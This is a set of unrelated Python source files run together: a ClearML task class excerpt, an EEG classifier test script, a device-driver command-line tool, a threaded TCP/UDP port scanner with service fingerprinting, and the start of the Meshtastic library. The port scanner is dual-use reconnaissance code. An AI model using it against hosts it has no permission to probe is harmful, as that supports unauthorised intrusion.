return running_remotely() and get_remote_task_id() == self.id
def _edit(self, **kwargs):
# type: (**Any) -> Any
with self._edit_lock:
if self._offline_mode:
for k, v in kwargs.items():
setattr(self.data, k, v)
Path(self.get_offline_mode_folder()).mkdir(parents=True, exist_ok=True)
with open((self.get_offline_mode_folder() / self._offline_filename).as_posix(), 'wt') as f:
export_data = self.data.to_dict()
export_data['project_name'] = self.get_project_name()
export_data['offline_folder'] = self.get_offline_mode_folder().as_posix()
json.dump(export_data, f, ensure_ascii=True, sort_keys=True)
return None
# Since we are using a forced update, make sure the task status is valid
status = self._data.status if self._data and self._reload_skip_flag else self.data.status
if status not in (tasks.TaskStatusEnum.created, tasks.TaskStatusEnum.in_progress):
# the exception being name/comment that we can always change.
if kwargs and all(k in ('name', 'comment', 'tags', 'system_tags', 'runtime') for k in kwargs.keys()):
pass
else:
raise ValueError('Task object can only be updated if created or in_progress')
res = self.send(tasks.EditRequest(task=self.id, force=True, **kwargs), raise_on_errors=False)
return res
def _update_requirements(self, requirements):
# type: (Union[dict, str]) -> ()
if not isinstance(requirements, dict):
requirements = {'pip': requirements}
# make sure we have str as values:
for key in requirements.keys():
if requirements[key] and not isinstance(requirements[key], str):
requirements[key] = '\n'.join(requirements[key])
# protection, Old API might not support it
# noinspection PyBroadException
try:
with self._edit_lock:
self.reload()
self.data.script.requirements = requirements
if self._offline_mode:
self._edit(script=self.data.script)
else:
self.send(tasks.SetRequirementsRequest(task=self.id, requirements=requirements))
except Exception:
pass
def _update_script(self, script):
# type: (dict) -> ()
with self._edit_lock:
self.reload()
self.data.script = script
self._edit(script=script)
def _set_configuration(self, name, description=None, config_type=None, config_text=None, config_dict=None):
# type: (str, Optional[str], Optional[str], Optional[str], Optional[Union[Mapping, list]]) -> None
"""
Set Task configuration text/dict. Multiple configurations are supported.
:param str name: Configuration name.
:param str description: Configuration section description.
:param str config_type: Optional configuration format type (str).
:param config_text: model configuration (unconstrained text string). usually the content
of a configuration file. If `config_text` is not None, `config_dict` must not be provided.
:param config_dict: model configuration parameters dictionary.
If `config_dict` is not None, `config_text` must not be provided.
"""
# make sure we have either dict or text
mutually_exclusive(config_dict=config_dict, config_text=config_text, _check_none=True)
if not Session.check_min_api_version('2.9'):
raise ValueError("Multiple configurations are not supported with the current 'clearml-server', "
"please upgrade to the latest version")
if description:
description = str(description)
# support empty string
a_config = config_dict_to_text(config_dict if config_text is None else config_text)
with self._edit_lock:
self.reload()
configuration = self.data.configuration or {}
configuration[name] = tasks.ConfigurationItem(
name=name, value=a_config, description=description or None, type=config_type or None)
self._edit(configuration=configuration)
def _get_configuration_text(self, name):
# type: (str) -> Optional[str]
"""
Get Task configuration section as text
:param str name: Configuration name.
:return: The Task configuration as text (unconstrained text string).
return None if configuration name is not valid.
"""
if not Session.check_min_api_version('2.9'):
raise ValueError("Multiple configurations are not supported with the current 'clearml-server', "
"please upgrade to the latest version")
configuration = self.data.configuration or {}
if not configuration.get(name):
return None
return configuration[name].value
def _get_configuration_dict(self, name):
# type: (str) -> Optional[dict]
"""
Get Task configuration section as dictionary
:param str name: Configuration name.
:return: The Task configuration as dictionary.
return None if configuration name is not valid.
"""
config_text = self._get_configuration_text(name)
if not config_text:
return None
return text_to_config_dict(config_text)
def get_offline_mode_folder(self):
# type: () -> (Optional[Path])
"""
Return the folder where all the task outputs and logs are stored in the offline session.
:return: Path object, local folder, later to be used with `report_offline_session()`
"""
if not self._offline_mode:
return None
return get_offline_dir(task_id=self.task_id)
@classmethod
def _clone_task(
cls,
cloned_task_id, # type: str
name=None, # type: Optional[str]
comment=None, # type: Optional[str]
execution_overrides=None, # type: Optional[dict]
tags=None, # type: Optional[Sequence[str]]
parent=None, # type: Optional[str]
project=None, # type: Optional[str]
log=None, # type: Optional[logging.Logger]
session=None, # type: Optional[Session]
):
# type: (...) -> str
"""
Clone a task
:param str cloned_task_id: Task ID for the task to be cloned
:param str name: Name for the new task
:param str comment: Optional comment for the new task
:param dict execution_overrides: Task execution overrides. Applied over the cloned task's execution
section, useful for overriding values in the cloned task.
:param list tags: Optional updated model tags
:param str parent: Optional parent Task ID of the new task.
:param str project: Optional project ID of the new task.
If None, the new task will inherit the cloned task's project.
:param logging.Logger log: Log object used by the infrastructure.
:param Session session: Session object used for sending requests to the API
:return: The new task's ID.
"""
session = session if session else cls._get_default_session()
use_clone_api = Session.check_min_api_version('2.9')
if use_clone_api:
res = cls._send(
session=session, log=log,
req=tasks.CloneRequest(
task=cloned_task_id,
new_task_name=name,
new_task_tags=tags,
new_task_comment=comment,
new_task_parent=parent,
new_task_project=project,
execution_overrides=execution_overrides,
)
)
cloned_task_id = res.response.id
return cloned_task_id
res = cls._send(session=session, log=log, req=tasks.GetByIdRequest(task=cloned_task_id))
task = res.response.task
output_dest = None
if task.output:
output_dest = task.output.destination
execution = task.execution.to_dict() if task.execution else {}
execution = ConfigTree.merge_configs(ConfigFactory.from_dict(execution),
ConfigFactory.from_dict(execution_overrides or {}))
# keep only input artifacts, drop output artifacts
execution['artifacts'] = [e for e in execution['artifacts'] if e.get('mode') == 'input']
if not hasattr(task, 'system_tags') and not tags and task.tags:
tags = [t for t in task.tags if t != cls._development_tag]
extra = {}
if hasattr(task, 'hyperparams'):
extra['hyperparams'] = task.hyperparams
if hasattr(task, 'configuration'):
extra['configuration'] = task.configuration
if getattr(task, 'system_tags', None):
extra['system_tags'] = [t for t in task.system_tags if t not in (cls._development_tag, cls.archived_tag)]
req = tasks.CreateRequest(
name=name or task.name,
type=task.type,
input=task.input if hasattr(task, 'input') else {'view': {}},
tags=tags,
comment=comment if comment is not None else task.comment,
parent=parent,
project=project if project else task.project,
output_dest=output_dest,
execution=execution.as_plain_ordered_dict(),
script=task.script,
**extra
)
res = cls._send(session=session, log=log, req=req)
cloned_task_id = res.response.id
if task.script and task.script.requirements:
cls._send(session=session, log=log, req=tasks.SetRequirementsRequest(
task=cloned_task_id, requirements=task.script.requirements))
return cloned_task_id
@classmethod
def get_all(cls, session=None, log=None, **kwargs):
# type: (Optional[Session], Optional[logging.Logger], **Any) -> Any
"""
List all the Tasks based on specific projection.
:param Session session: The session object used for sending requests to the API.
:param logging.Logger log: The Log object.
:param kwargs: Keyword args passed to the GetAllRequest
(see :class:`.backend_api.services.v2_5.tasks.GetAllRequest`)
For example:
.. code-block:: py
status='completed', search_text='specific_word', user='user_id', project='project_id'
:type kwargs: dict
:return: The API response.
"""
session = session if session else cls._get_default_session()
req = tasks.GetAllRequest(**kwargs)
res = cls._send(session=session, req=req, log=log)
return res
@classmethod
def get_by_name(cls, task_name):
# type: (str) -> Task
res = cls._send(cls._get_default_session(), tasks.GetAllRequest(name=exact_match_regex(task_name)))
task = get_single_result(entity='task', query=task_name, results=res.response.tasks)
return cls(task_id=task.id)
@classmethod
def _get_project_name(cls, project_id):
res = cls._send(cls._get_default_session(), projects.GetByIdRequest(project=project_id), raise_on_errors=False)
if not res or not res.response or not res.response.project:
return None
return res.response.project.name
def _get_all_events(
self, max_events=100, batch_size=500, order='asc', event_type=None, unique_selector=itemgetter("url")
):
# type: (int, int, str, str, Callable[[dict], Any]) -> Union[List[Any], Set[Any]]
"""
Get a list of all reported events.
Warning: Debug only. Do not use outside of testing.
:param max_events: The maximum events the function will return. Pass None
to return all the reported events.
:param batch_size: The maximum number of events retrieved by each internal call performed by this method.
:param order: Events order (by timestamp) - "asc" for ascending, "desc" for descending.
:param event_type: Event type. Pass None to get all event types.
:param unique_selector: If provided, used to select a value from each event, only a unique set of these
values will be returned by this method.
:return: A list of events from the task. If unique_selector was provided, a set of values selected from events
of the task.
"""
batch_size = max_events or batch_size
log_events = self.send(events.GetTaskEventsRequest(
task=self.id,
order=order,
batch_size=batch_size,
event_type=event_type,
))
returned_count = log_events.response.returned
total_events = log_events.response.total
scroll = log_events.response.scroll_id
if unique_selector:
events_list = set(map(unique_selector, log_events.response.events))
else:
events_list = log_events.response.events
while returned_count < total_events and (max_events is None or len(events_list) < max_events):
log_events = self.send(events.GetTaskEventsRequest(
task=self.id,
order=order,
batch_size=batch_size,
event_type=event_type,
scroll_id=scroll,
))
scroll = log_events.response.scroll_id
returned_count += log_events.response.returned
if unique_selector:
events_list.update(log_events.response.events)
else:
events_list.extend(log_events.response.events)
return events_list
@property
def _edit_lock(self):
# type: () -> ()
# skip the actual lock, this one-time lock will always enter
# only used on shutdown process to avoid deadlocks
if self.__edit_lock is False:
return RLock()
if self.__edit_lock:
return self.__edit_lock
if not PROC_MASTER_ID_ENV_VAR.get() or len(PROC_MASTER_ID_ENV_VAR.get().split(':')) < 2:
self.__edit_lock = RLock()
elif PROC_MASTER_ID_ENV_VAR.get().split(':')[1] == str(self.id):
filename = os.path.join(gettempdir(), 'clearml_{}.lock'.format(self.id))
# no need to remove previous file lock if we have a dead process, it will automatically release the lock.
# # noinspection PyBroadException
# try:
# os.unlink(filename)
# except Exception:
# pass
# create a new file based lock
self.__edit_lock = FileRLock(filename=filename)
else:
self.__edit_lock = RLock()
return self.__edit_lock
@_edit_lock.setter
def _edit_lock(self, value):
# type: (RLock) -> ()
self.__edit_lock = value
@classmethod
def __update_master_pid_task(cls, pid=None, task=None):
# type: (Optional[int], Optional[Union[str, Task]]) -> None
pid = pid or os.getpid()
if not task:
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':')
elif isinstance(task, str):
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':' + task)
else:
# noinspection PyUnresolvedReferences
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':' + str(task.id))
# make sure we refresh the edit lock next time we need it,
task._edit_lock = None
@classmethod
def __get_master_id_task_id(cls):
# type: () -> Optional[str]
master_pid, _, master_task_id = PROC_MASTER_ID_ENV_VAR.get('').partition(':')
# we could not find a task ID, revert to old stub behaviour
if not master_task_id:
return None
return master_task_id
@classmethod
def __get_master_process_id(cls):
# type: () -> Optional[str]
master_task_id = PROC_MASTER_ID_ENV_VAR.get().split(':')
# we could not find a task ID, revert to old stub behaviour
if len(master_task_id) < 2 or not master_task_id[1]:
return None
return master_task_id[0]
@classmethod
def __is_subprocess(cls):
# type: () -> bool
# notice this class function is called from Task.ExitHooks, do not rename/move it.
is_subprocess = PROC_MASTER_ID_ENV_VAR.get() and \
PROC_MASTER_ID_ENV_VAR.get().split(':')[0] != str(os.getpid())
return is_subprocess
@classmethod
def set_offline(cls, offline_mode=False):
# type: (bool) -> None
"""
Set offline mode, where all data and logs are stored in a local folder for later transmission.
:param offline_mode: If True, offline-mode is turned on, and no communication to the backend is enabled.
:return:
"""
if not running_remotely():
ENV_OFFLINE_MODE.set(offline_mode)
InterfaceBase._offline_mode = bool(offline_mode)
Session._offline_mode = bool(offline_mode)
@classmethod
def is_offline(cls):
# type: () -> bool
"""
Return the offline-mode state. If in offline-mode, no communication to the backend is enabled.
:return: boolean offline-mode state
"""
return cls._offline_mode
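# Hedged offline-mode sketch using only the methods defined here:
#   Task.set_offline(offline_mode=True)      # no backend communication from now on
#   ...                                      # run the experiment as usual
#   print(task.get_offline_mode_folder())    # local folder holding the session data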
@classmethod
def _get_task_status(cls, task_id):
# type: (str) -> (Optional[str], Optional[str])
if cls._offline_mode:
return tasks.TaskStatusEnum.created, 'offline'
# noinspection PyBroadException
try:
all_tasks = cls._get_default_session().send(
tasks.GetAllRequest(id=[task_id], only_fields=['status', 'status_message']),
).response.tasks
return all_tasks[0].status, all_tasks[0].status_message
except Exception:
return None, None
|
_unit_testing.py
|
import os
from threading import Thread
from time import time, sleep
from winsound import Beep
import numpy as np
from rx.operators import take_until_with_time
try:
from neurosky.utils import KeyHandler
from neurosky._connector import Connector
from neurosky._processor import Processor
from neurosky._new_trainer import Trainer
from neurosky._status_manager import StatusManager
except ModuleNotFoundError:
# noinspection PyUnresolvedReferences
from utils import KeyHandler
# noinspection PyUnresolvedReferences
from _connector import Connector
# noinspection PyUnresolvedReferences
from _processor import Processor
# noinspection PyUnresolvedReferences
from _new_trainer import Trainer
# noinspection PyUnresolvedReferences
from _status_manager import StatusManager
def _init_thread(target, args=()):
Thread(target=target, args=args).start()
class _Tester:
def __init__(self):
# initialize
# record
# process with recorded data
# train
self.counter = 0
self.signal_status = 'Poor Signal'
self.is_prediction_mode = False
self.data_to_predict = []
# Initializing
self.status_manager = StatusManager()
self.status_manager.update_status('Initializing...')
# self.connector = Connector(debug=False, verbose=False)
self.processor = Processor(batch_mode=True)
self.trainer = Trainer(classifier_name='MLP') # 'MLP' || 'RandomForest' || 'SVC' || 'KNN' || 'AdaBoost'
# self.connector.poor_signal_level.subscribe(self.check_poor_level)
self.IDENTIFIER_RIGHT_ARM = self.status_manager.add_identifier('right_arm')
self.IDENTIFIER_LEFT_ARM = self.status_manager.add_identifier('left_arm')
self.IDENTIFIER_IDLE = self.status_manager.add_identifier('idle')
# self.key_handler = KeyHandler()
# self.key_handler.add_key_event(key='q', event=self.close_all)
# self.key_handler.add_key_event(key=chr(96), event=self.train, identifier=self.IDENTIFIER_RIGHT_ARM)
# self.key_handler.add_key_event(key=chr(45), event=self.train, identifier=self.IDENTIFIER_LEFT_ARM)
# self.key_handler.add_key_event(key='c', event=self._init_training)
# self.key_handler.add_key_event(key='p', event=self.toggle_prediction)
# self.key_handler.add_key_event(key='3', event=self.train, identifier=self.IDENTIFIER_IDLE)
# self.key_handler.add_key_event(key='p', event=self.trainer.predict)
# self.key_handler.start()
self._init_training()
# self.connector.data.pipe(take_until_with_time(10)).subscribe(
# observer=self.data_to_predict.append,
# on_error=print,
# on_completed=self.recursive_predict
# )
# self.trainer.prediction.subscribe(self.status_manager.predicted_identifier)
def recursive_predict(self):
if self.is_prediction_mode:
self.processor.add_data_batch(self.data_to_predict)
# X = self.processor.pca(self.processor.processed_data.reshape(1, -1))
self.trainer.predict(self.data_to_predict)
self.connector.data.pipe(take_until_with_time(1)).subscribe(
observer=self.loop_data,
on_error=print,
on_completed=self.recursive_predict
)
def loop_data(self, data):
self.data_to_predict.pop(0)
self.data_to_predict.append(data)
def toggle_prediction(self):
self.is_prediction_mode = not self.is_prediction_mode
def _init_training(self):
dir_size = int(len(os.listdir('./motor_imagery_data')) / 2)
split = int(dir_size/3)*2
X = []
y = []
for i in range(split):
right_arm_data = np.load('./motor_imagery_data/right_arm_' + str(i + 1) + '.npy')
self.processor.add_data_batch(right_arm_data)
X.append(self.processor.processed_data)
y.append(self.IDENTIFIER_RIGHT_ARM)
left_arm_data = np.load('./motor_imagery_data/left_arm_' + str(i + 1) + '.npy')
self.processor.add_data_batch(left_arm_data)
X.append(self.processor.processed_data)
y.append(self.IDENTIFIER_LEFT_ARM)
X = self.processor.pca(X)
self.trainer.add_data(X, y)
self.trainer._train()
X_test = []
y_test = []
for i in range(split, dir_size):
right_arm_data = np.load('./motor_imagery_data/right_arm_' + str(i + 1) + '.npy')
self.processor.add_data_batch(right_arm_data)
X_test.append(self.processor.processed_data)
y_test.append(self.IDENTIFIER_RIGHT_ARM)
left_arm_data = np.load('./motor_imagery_data/left_arm_' + str(i + 1) + '.npy')
self.processor.add_data_batch(left_arm_data)
X_test.append(self.processor.processed_data)
y_test.append(self.IDENTIFIER_LEFT_ARM)
X_test = self.processor.pca(X_test)
self.trainer.add_data(X_test, y_test)
print(self.trainer.cls.score(self.trainer.samples, self.trainer.targets))
self.trainer.clear_data()
# self.close_all()
def train(self, identifier):
self.status_manager.update_status('Preparing...')
start_time = time()
while time() - start_time < 3:
pass
Beep(500, 100)
for _ in range(5):
self.status_manager.update_status('Recording...')
self.connector.record('./motor_imagery_data/' + self.status_manager.next_label(identifier))
self.connector.await_recording()
Beep(500, 100)
Beep(500, 100)
# self.status_manager.update_status('Pre-processing...')
# self.processor.add_data_batch(self.connector.recorded_data)
# self.status_manager.update_status('Training...')
# self.trainer.add_data(self.processor.processed_data[0])
# self.trainer.train(identifier)
def check_poor_level(self, level):
if level > 0:
if self.signal_status != 'Poor Signal...':
print('Poor Signal...')
self.signal_status = 'Poor Signal...'
else:
if self.signal_status != 'Good Signal':
print('Good Signal')
self.signal_status = 'Good Signal'
def close_all(self):
self.trainer.close()
self.processor.close()
# self.connector.close()
self.status_manager.close()
# self.key_handler.stop()
if __name__ == '__main__':
total_size = 0
for i in range(int(len(os.listdir('./motor_imagery_data')) / 2)):
right_arm_data = np.load('./motor_imagery_data/right_arm_' + str(i + 1) + '.npy')
print(len(right_arm_data))
total_size += len(right_arm_data)
left_arm_data = np.load('./motor_imagery_data/left_arm_' + str(i + 1) + '.npy')
print(len(left_arm_data))
total_size += len(left_arm_data)
print(total_size)
#
# tester = _Tester()
# tester.status_manager.status.subscribe(print)
|
cli.py
|
"""
Command line entry
"""
import os
import sys
import time
import threading
from os import getpid
import psutil
# from .web import Webserver
from ..models import WebserverArgs
from ..core.driver import (Driver, DriverEvents)
from ..core.device_context import DeviceContext
from ..core.tunnel_base import TunnelEvents
from ..framework import AppLogger
from ..framework.utils import resource
from ..framework.constants import APP_TYPE
from ..framework.context import APP_CONTEXT
class CommandLine:
'''Command line entry class
'''
options = None
_tunnel = None
_driver = None
webserver_running = False
supported_commands = []
input_string = None
current_command = None
def __init__(self, **kwargs):
self._build_options(**kwargs)
APP_CONTEXT.mode = APP_TYPE.CLI
# self.communication = 'uart'
# self.device_provider = None
# self.communicator = None
# self.webserver = Webserver(**kwargs)
def listen(self):
'''
Prepare components, initialize the application
'''
# prepare driver
threading.Thread(target=self._prepare_driver).start()
# prepare logger
self._prepare_logger()
def handle_discovered(self, device_provider):
device_context = DeviceContext(device_provider)
APP_CONTEXT.device_context = device_context
if self._tunnel:
self._tunnel.notify('discovered')
def handle_lost(self):
if self._tunnel:
self._tunnel.notify('lost')
def handle_upgrade_finished(self):
if self._tunnel:
self._tunnel.notify(
'continous', 'upgrade_complete', {'success': True})
def handle_upgrade_fail(self, code, message):
if self._tunnel:
self._tunnel.notify('continous', 'upgrade_complete', {
'success': False, 'code': code, 'message': message})
def handle_error(self, error, message):
if self._tunnel:
self._tunnel.notify('lost')
def handle_request(self, method, converted_method, parameters):
result = self._driver.execute(converted_method, parameters)
if self._tunnel:
self._tunnel.notify('invoke', method, result)
def handle_receive_continous_data(self, packet_type, data):
if self._tunnel:
self._tunnel.notify('continous', packet_type, data)
def _prepare_driver(self):
self._driver = Driver(self.options)
self._driver.on(DriverEvents.Discovered,
self.handle_discovered)
self._driver.on(DriverEvents.Lost,
self.handle_lost)
self._driver.on(DriverEvents.UpgradeFinished,
self.handle_upgrade_finished)
self._driver.on(DriverEvents.UpgradeFail,
self.handle_upgrade_fail)
self._driver.on(DriverEvents.Error,
self.handle_error)
self._driver.on(DriverEvents.Continous,
self.handle_receive_continous_data)
self._driver.detect()
self.setup_command_handler()
def _prepare_logger(self):
'''
Set default log handler: console logger, file logger
'''
executor_path = resource.get_executor_path()
log_level = 'info'
if self.options.debug:
log_level = 'debug'
console_log = self.options.console_log
APP_CONTEXT.set_logger(
AppLogger(
filename=os.path.join(executor_path, 'loggers', 'trace.log'),
gen_file=True,
level=log_level,
console_log=console_log
))
APP_CONTEXT.set_print_logger(
AppLogger(
filename=os.path.join(
executor_path, 'loggers', 'print_' + time.strftime('%Y%m%d_%H%M%S') + '.log'),
gen_file=True,
level=log_level
))
def setup_command_handler(self):
'''
Prepare command
'''
self.supported_commands = self._driver.execute('get_command_lines')
cmd_flag = True
while True:
if cmd_flag:
token = input(">>")
else:
token = input("")
self.input_string = token.split(" ")
if token.strip() == 'exit':
break
if self.webserver_running and token.strip() != 'stop':
print("server is on-going, please stop it")
continue
for command in self.supported_commands:
if command['name'] == self.input_string[0]:
self.current_command = command
eval('self.%s()' % (command['function']))
cmd_flag = False
break
else:
self.help_handler()
self.exit_handler()
return True
def start_webserver(self):
'''
Start websocket server
'''
import tornado.ioloop
if sys.version_info[0] > 2:
import asyncio
asyncio.set_event_loop(asyncio.new_event_loop())
event_loop = tornado.ioloop.IOLoop.current()
self._tunnel = WebServer(self.options, event_loop)
self._tunnel.on(TunnelEvents.Request, self.handle_request)
self._tunnel.setup()
def _build_options(self, **kwargs):
self.options = WebserverArgs(**kwargs)
# command handler
def help_handler(self):
'''
Help handler
'''
if len(self.supported_commands) > 0:
print("Usage: ")
for command in self.supported_commands:
print(command['name'] + " : " + command['description'])
else:
print("No more command line.")
def connect_handler(self):
'''
Connect to device; may not be needed later
'''
print(self._driver.execute('get_device_info'))
def upgrade_handler(self):
'''upgrade command is used for firmware upgrade and followed by file name
'''
input_args = len(self.input_string)
if input_args == 1:
print("Usage:")
print("upgrade file_name")
else:
file_name = self.input_string[1]
# TODO: check device is idle
self._driver.execute('upgrade_framework', file_name)
return True
def record_handler(self):
'''record command is used to save the outputs to the local machine
'''
# TODO: check device is idle
if APP_CONTEXT.device_context.runtime_status != 'LOGGING':
self._driver.execute('start_data_log')
return True
def stop_handler(self):
'''stop command is used to stop data logging and the websocket server, if running
'''
# TODO: check device is idle
if APP_CONTEXT.device_context.runtime_status == 'LOGGING':
self._driver.execute('stop_data_log')
if self.webserver_running:
self._tunnel.stop_ws_server()
self.webserver_running = False
return True
def get_handler(self):
'''
Get parameter of device
'''
input_args = len(self.input_string)
conf = self._driver.execute('get_conf')
input_params_properties = conf['data']['inputParams']
select_param = None
if (input_args == 1):
print("Usage: get [options]")
print("Option: ")
i = 2
while i < len(input_params_properties):
print(input_params_properties[i]['argument'])
i += 1
return True
else:
i = 2
while i < len(input_params_properties):
select_param = input_params_properties[i]
if (select_param['argument'] == self.input_string[1]):
break
i += 1
if (i == len(input_params_properties)):
print("Usage: get [options]")
print("Option: ")
i = 2
while i < len(input_params_properties):
print(input_params_properties[i]['argument'])
i += 1
return True
param = self._driver.execute(
'get_param', {'paramId': select_param['paramId']})
print(param['data']['value'])
return True
def set_handler(self):
'''
Set parameter of device
'''
input_args = len(self.input_string)
conf = self._driver.execute('get_conf')
input_params_properties = conf['data']['inputParams']
select_param = None
not_in_options = False
options = []
if input_args == 1:
print("Usage: set <options> <values>")
i = 2
while i < len(input_params_properties):
print(input_params_properties[i]['argument'])
i += 1
return True
else:
i = 2
while i < len(input_params_properties):
select_param = input_params_properties[i]
if (select_param['argument'] == self.input_string[1]):
break
i += 1
if input_args == 2:
if i == len(input_params_properties):
print("Usage: set <options> <values>")
i = 2
while i < len(input_params_properties):
print(input_params_properties[i]['argument'])
i += 1
else:
print("Usage: set " + select_param['argument'] + " <values>")
print("values: ")
print(select_param['options'])
return True
if select_param.__contains__('options'):
for item in select_param['options']:
if isinstance(item, dict):
options.append(int(item['key']))
else:
options.append(item)
if select_param['type'] == 'int64':
self.input_string[2] = int(self.input_string[2])
if select_param['type'] == "char8" and self.input_string[2] not in select_param['options']:
not_in_options = True
if select_param['type'] == "int64" and\
self.input_string[2] not in options:
not_in_options = True
if not_in_options:
print("Usage: set " + select_param['argument'] + " <values>")
print("values: ")
print(select_param['options'])
return True
conf = self._driver.execute('set_param', {
'paramId': select_param['paramId'],
'value': self.input_string[2]
})
# TODO: display a response message to user
return True
def save_handler(self):
'''
Save device configuration
'''
self._driver.execute('save_config')
return True
def server_start_handler(self):
'''
start a websocket server
'''
return True
def exit_handler(self):
'''
Exit current process
'''
# self.webserver.stop()
# self.webserver_running = False
pid = getpid()
process = psutil.Process(pid)
process.kill()
def run_handler(self):
'''used by customers
'''
return True
|
portscan.py
|
import socket
import threading
import queue
import random
random_time = random.randint(2 ** 16, 2 ** 64 - 1).to_bytes(8, 'big')
udp_to_send = b'\x13' + b'\0' * 39 + random_time
def define_proto(data):
if len(data) > 4 and data[:4] == b'HTTP':
return ' HTTP'
if b'SMTP' in data:
return ' SMTP'
if b'POP3' in data:
return ' POP3'
if b'IMAP' in data:
return ' IMAP'
if len(data) > 11 and data[:2] == udp_to_send[:2] and (data[3] & 1) == 1:
return ' DNS'
if len(data) > 39:
mode = 7 & data[0]
version = (data[0] >> 3) & 7
if mode == 4 and version == 2 and random_time == data[24:32]:
return ' NTP'
return ''
def make_queue(start_port, end_port, tcp, udp):
"""Максимальное число записей равно 130`000, поэтому решил не заморачиваться"""
q = queue.Queue()
for i in range(start_port, end_port + 1):
if tcp:
q.put(('t', i))
if udp:
q.put(('u', i))
return q
class Scanner:
def __init__(self, host: str, start_port: int = 1, end_port: int = 65535, tcp: bool = True,
udp: bool = True, timeout: float = 0.5, workers: int = 20):
self.host = host
self.ports = make_queue(start_port, end_port, tcp, udp)
socket.setdefaulttimeout(timeout)
self.to_print = queue.Queue()
self.isWorking = True
self.threads = [threading.Thread(target=self._do_work) for _ in range(workers)]
def start(self):
for t in self.threads:
t.daemon = True
t.start()
while not self.ports.empty() and self.isWorking:
try:
print(self.to_print.get(block=False))
except queue.Empty:
pass
for t in self.threads:
t.join()
while not self.to_print.empty():
print(self.to_print.get())
def stop(self):
self.isWorking = False
for t in self.threads:
t.join()
def _do_work(self):
while self.isWorking:
try:
_type, port = self.ports.get(block=False)
except queue.Empty:
break
else:
if _type == 't':
self._check_tcp(port)
if _type == 'u':
self._check_udp(port)
def _check_tcp(self, port):
sock = socket.socket()
try:
sock.connect((self.host, port))
except socket.error:
pass
except ConnectionResetError:
pass
else:
sock.send(b'a'*250 + b'\r\n\r\n')
try:
data = sock.recv(1024)
self.to_print.put(f'TCP {port}{define_proto(data)}')
except socket.timeout:
self.to_print.put(f'TCP {port}')
finally:
sock.close()
def _check_udp(self, port):
sender = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
sender.sendto(udp_to_send, (self.host, port))
data, host = sender.recvfrom(1024)
except ConnectionResetError:
pass
except socket.timeout:
self.to_print.put(f'UDP {port}')
else:
self.to_print.put(f'UDP {port}{define_proto(data)}')
finally:
sender.close()
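# A minimal usage sketch (assumption: the host and port range below are illustrative);
# prints open ports and any protocol detected by define_proto().
if __name__ == '__main__':
    scanner = Scanner('127.0.0.1', start_port=1, end_port=1024, tcp=True, udp=False)
    scanner.start()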
|
__init__.py
|
"""
# an API for Meshtastic devices
Primary class: SerialInterface
Install with pip: "[pip3 install meshtastic](https://pypi.org/project/meshtastic/)"
Source code on [github](https://github.com/meshtastic/Meshtastic-python)
properties of SerialInterface:
- radioConfig - Current radio configuration and device settings, if you write to this the new settings will be applied to
the device.
- nodes - The database of received nodes. Includes always up-to-date location and username information for each
node in the mesh. This is a read-only datastructure.
- nodesByNum - like "nodes" but keyed by nodeNum instead of nodeId
- myInfo - Contains read-only information about the local radio device (software version, hardware version, etc)
# Published PubSub topics
We use a [publish-subscribe](https://pypubsub.readthedocs.io/en/v4.0.3/) model to communicate asynchronous events. Available
topics:
- meshtastic.connection.established - published once we've successfully connected to the radio and downloaded the node DB
- meshtastic.connection.lost - published once we've lost our link to the radio
- meshtastic.receive.text(packet) - delivers a received packet as a dictionary, if you only care about a particular
type of packet, you should subscribe to the full topic name. If you want to see all packets, simply subscribe to "meshtastic.receive".
- meshtastic.receive.position(packet)
- meshtastic.receive.user(packet)
- meshtastic.receive.data.portnum(packet) (where portnum is an integer or well known PortNum enum)
- meshtastic.node.updated(node = NodeInfo) - published when a node in the DB changes (appears, location changed, username changed, etc...)
We receive position, user, or data packets from the mesh. You probably only care about meshtastic.receive.data. The first argument for
that publish will be the packet. Text or binary data packets (from sendData or sendText) will both arrive this way. If you print packet
you'll see the fields in the dictionary. decoded.data.payload will contain the raw bytes that were sent. If the packet was sent with
sendText, decoded.data.text will **also** be populated with the decoded string. For ASCII these two strings will be the same, but for
unicode scripts they can be different.
# Example Usage
```
import meshtastic
from pubsub import pub
def onReceive(packet, interface): # called when a packet arrives
print(f"Received: {packet}")
def onConnection(interface, topic=pub.AUTO_TOPIC): # called when we (re)connect to the radio
# defaults to broadcast, specify a destination ID if you wish
interface.sendText("hello mesh")
pub.subscribe(onReceive, "meshtastic.receive")
pub.subscribe(onConnection, "meshtastic.connection.established")
# By default will try to find a meshtastic device, otherwise provide a device path like /dev/ttyUSB0
interface = meshtastic.SerialInterface()
```
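A further hypothetical sketch (not from the upstream docs): targeting a single node and listening
only for a specific application portnum. The node ID "!deadbeef" and the payload are placeholders.
```
import meshtastic
from meshtastic import portnums_pb2
from pubsub import pub

def onPrivateData(packet, interface):  # called only for PRIVATE_APP data packets
    print(packet["decoded"]["payload"])

# data topics are suffixed with the portnum name, e.g. "meshtastic.receive.data.PRIVATE_APP"
pub.subscribe(onPrivateData, "meshtastic.receive.data.PRIVATE_APP")

interface = meshtastic.SerialInterface()
interface.sendData(b"ping", destinationId="!deadbeef",
                   portNum=portnums_pb2.PortNum.PRIVATE_APP, wantAck=True)
```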
"""
import base64
import logging
import os
import platform
import random
import socket
import sys
import stat
import threading
import traceback
import time
from datetime import datetime
from typing import *
import serial
import timeago
import google.protobuf.json_format
import pygatt
from pubsub import pub
from dotmap import DotMap
from tabulate import tabulate
from google.protobuf.json_format import MessageToJson
from .util import fixme, catchAndIgnore, stripnl, DeferredExecution, Timeout
from .node import Node
from . import mesh_pb2, portnums_pb2, apponly_pb2, admin_pb2, environmental_measurement_pb2, remote_hardware_pb2, channel_pb2, radioconfig_pb2, util
START1 = 0x94
START2 = 0xc3
HEADER_LEN = 4
MAX_TO_FROM_RADIO_SIZE = 512
defaultHopLimit = 3
"""A special ID that means broadcast"""
BROADCAST_ADDR = "^all"
"""A special ID that means the local node"""
LOCAL_ADDR = "^local"
# if using 8 bit nodenums this will be shortened on the target
BROADCAST_NUM = 0xffffffff
"""The numeric buildnumber (shared with android apps) specifying the level of device code we are guaranteed to understand
format is Mmmss (where M is 1 + the numeric major number), i.e. 20120 means 1.1.20
"""
OUR_APP_VERSION = 20200
publishingThread = DeferredExecution("publishing")
class ResponseHandler(NamedTuple):
"""A pending response callback, waiting for a response to one of our messages"""
# requestId: int - used only as a key
callback: Callable
# FIXME, add timestamp and age out old requests
